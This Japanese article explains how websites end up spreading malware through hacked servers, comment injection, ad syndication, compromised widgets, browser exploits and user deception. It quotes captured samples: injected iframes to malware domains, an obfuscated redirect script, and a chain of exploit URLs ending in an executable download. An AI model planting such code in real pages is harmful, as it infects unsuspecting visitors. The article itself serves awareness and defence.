Webサーバのセキュリティが破られる場合

多くのWebページをホストするWebサーバが何らかのセキュリティホールを攻撃されて、悪意あるユーザに乗っ取られた場合、そのサーバ内のWebページはすべてマルウェアの配布ベクタに変容することとなる。次の例はInvision Power Boardシステム内の全ページに自動的に挿入されるcopyright表記にマルウェアインストールのトリガが埋め込まれていた例である。

<!-- Copyright Information -->
<div align='center' class='copyright'>Powered by
<a href="http://www.invisionboard.com">Invision Power Board</a>(U)
v1.3.1 Final &copy; 2003 &nbsp;
<a href='http://www.invisionpower.com'>IPS, Inc.</a></div>
</div>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>

2つのiframeタグはこのcopyright表記がなされたページにアクセスしたすべてのユーザをマルウェア配布サイトにアクセスさせ、マルウェアのインストールを試みる。この例において誘導先URLは2006年10月にはfdghewrtewrtyrew.bizだったが、11月にはwsfgfdgrtyhgfd.net、12月にはstatrafongon.bizに変化していた。これはマルウェア配布サイトの生存期間を表していると考えられるが、最終的にこのページにアクセスしたGoogleのテスト環境は50ものマルウェアに感染したという。

ユーザコメントに悪意あるコードが埋め込まれる場合

通常、外部ユーザが書き込めるコメントはHTMLタグが利用できない場合が多いが、なかにはリンクなどいくつかのタグを許容しているシステムが存在する。コメントのスクリーニングが完全になされていれば問題はないが、それが不完全である場合、iframeタグやscriptタグを利用されてマルウェア配布サイトに誘導される場合がある。次の例はある投票サイトのコメント欄に記載された悪意あるコードの例である。このサイトでは一部のHTMLタグしか利用できないように制限していると主張していたが、次のコメントに挿入されたコードは機能していた。

<SCRIPT language=JavaScript>
function otqzyu(nemz)juyu="lo";sdfwe78="catio";
kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="('";
awq27="";sftfttft=4;fghdh="'ht";ji87gkol="tp:/";
polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";
jkhuift="e.c";jygyhg="om'";dh4=eval(fghdh+ji87gkol+
polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="')";
if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+ uyty+
iuiuh8889+vbb25+awq27+dh4+je15);
otqzyu();//
</SCRIPT>

このコードは制限を回避するためにわかりにくく書かれているが、整理する（属性値のみを抜き出していく）と次の様になる。

location.replace('http://videozfree.com')

このコメントを含む投票ページにアクセスしたブラウザは自動的にvideozfree.comにリダイレクトされ、マルウェアの攻撃にさらされることとなる。

悪意ある広告が配信される場合

ページ中に広告を配信する業者は数多くがあるが、なかには取得した広告スペースを他の広告業者に委託する業者も存在する。多くの場合こうした子請け、孫請けはWebオーナーの知らない間に行われ、実際に表示される広告は請負元の広告業者とは全く別の業者によって提供されている場合がある。Googleが見つけた極端な例は次のような多段構造をなしていた。

1. あるビデオ共有サイトは大手米国広告業者のバナー広告を貼っていた。
2. その広告は別の大手米国広告業者から広告を取得するJavascriptを生成する1行のJavascriptによって配信されていた。
3. 生成されたJavascriptは地理的な位置に応じた広告を出すより小さな米国の広告業者を指す別のJavascriptを生成していた。
4. 最終的にこの広告業者が生成した広告のHTMLはロシアの広告業者を指すiframeを含んでいた。
5. このページにアクセスしたユーザはiframe内のLocationヘッダによってxx.xx.xx.xx/seijs/という形式ののIPアドレスにリダイレクトされるようになっていた。
6. このIPアドレスではマルウェアをインストールさせる暗号化されたJavascriptを出力するようになっていた。

このように、Web管理者のあずかり知らぬところで、そのページにアクセスしたクライアントにマルウェアがインストールされるようになっていたのである。おそらく請負元の広告業者もこのことに気がついていないと考えられるが、本来は請負元の責任で、このようなケースが発生しないように確実にチェックを行う必要がある。

悪意あるサードパーティ製ウィジットを利用する場合

ウィジットは外部Javascriptへのリンク埋め込みやiframeによってサイト内に挿入されるが、典型的なウィジットとしてはアクセスカウンタが挙げられる。たとえばアクセスカウンタをサイトに導入するには次のようなコードを自分のページ内に挿入することとなる。

<!-- Begin Stat Basic code -->
<script language="JavaScript"
src="http://m1.stat.xx/basic.js">
</script><script language="JavaScript">
<!--
statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);
// -->
</script> <noscript>
<a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA">
<img src="http://m1.stat.xx/n?id=ST8BidmAHKthtwoWA"
border="0" nosave width="18" height="18"></a></noscript>
<!-- End Stat Basic code -->

さて、このウィジットは2006年のある時点までは真面目にアクセスカウンタとしての機能を果たしていた。ところが、2006年のある時期にこのウィジットは、カウンタにリンクされたすべてのユーザに対して攻撃を開始した。この例では、スクリプトはまずShockwave Flashなどの存在を検知し、次のようなJavascriptをメインページに出力しだしたのである。

d.write("<scr"+"ipt language=’JavaScript’
type=’text/javascript’
src=’http://m1.stats4u.yy/md.js?country=us&id="+ id +
"&_t="+(new Date()).getTime()+"’></scr"+"ipt>")

このコードは最終的には攻撃コードへと変容する一連のダウンロードをトリガした。

http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe

この一連のURLはMicosoft Security Bulletin MS03-011として知られるセキュリティホールを狙ったものであり、アクセスしたクライアントにマルウェアのインストールを試みるものであった。

驚くべき事に、このアクセスカウンタは実に4年以上にわたり誠実にアクセス解析サービスを提供してきており、ある日突然すべての訪問者に牙をむいたのである。これは完全に防ぐことは出来ないが、信用できるサイトのウィジットしか利用しないといった対策を取るしかないだろう。

ソフトウェアの脆弱性を突く場合

もっとも一般的な方法はMicrosoftのData Access Componentsの脆弱性を利用する方法である。次の例ではマルウェアの実行ファイルを自動的にダウンロードさせて実行させるのに、この脆弱性を利用している。

1. Webページ中のiframeタグを通して悪意あるコードがブラウザに配信される。
2. iframe中には通常安全でないActiveXオブジェクトのインスタンスを作成するJavascriptが含まれている。
3. Javascriptはマルウェアの実行ファイルをダウンロードするためにXMLHTTPリクエストを生成する。
4. Adodb.streamがダウンロードされた実行ファイルをディスク上に保存するために利用される。
5. Shell.Applicationが保存された実行ファイルを実行するために利用される。

たった20行のJavascriptが上記の手順を再現し、マルウェアのインストールを完遂させる。これらの手順は多くの場合マルウェア作者によって注意深く隠蔽される。

次に有名な例はMicrosoftのWebViewFolderIconの脆弱性を利用する手口である。ここでは、heap sprayingと呼ばれるテクニックを利用する。heap sprayingではヒープを大量のJavascriptコードで埋める。それぞれのJavascriptはマルウェアをダウンロードし実行させるx86命令を含んでおり、ヒープをあふれさせることでメモリ上にx86命令を展開、プログラムを実行させる。

これらの2つの手法は最も一般的な手法ではあるが、他にも多くの方法がある。最近の手口は巧妙化しており、まずJavascriptを介してユーザがInternetExplorerを利用しているのかFirefoxなのか確認し、JVMのバージョンと、当てられているセキュリティパッチをチェック、これらの情報から攻撃に最適な手法を選択する場合も確認されている。

ユーザを騙す場合

最も簡単なのはユーザ自らマルウェアをダウンロードし、インストールしてくれるように促すことである。確認された例では、ポルノムービーのサムネイルを表示し、それらをクリックするとWindows Media Playerに似たプラグインがロードされる。そして「Windows Media Playerは指定されたビデオファイルを再生できません。再生に必要なActiveX Objectをダウンロードするためにはここをクリックしてください」というメッセージを出す。ユーザが騙されてクリックするとマルウェアがダウンロードされ、インストールされるという仕組みだ。